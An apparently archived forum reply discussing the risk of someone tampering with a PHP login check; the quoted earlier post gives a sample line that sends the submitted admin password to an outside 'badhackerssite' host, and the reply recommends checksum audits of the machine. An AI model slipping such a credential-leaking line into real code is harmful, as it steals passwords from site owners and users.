|
|
Posted by Malcolm Dew-Jones on 10/08/10 11:27
Han (googlepost@safeblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]
It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.
In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occured).
--
This programmer available for rent.
[Back to original message]
|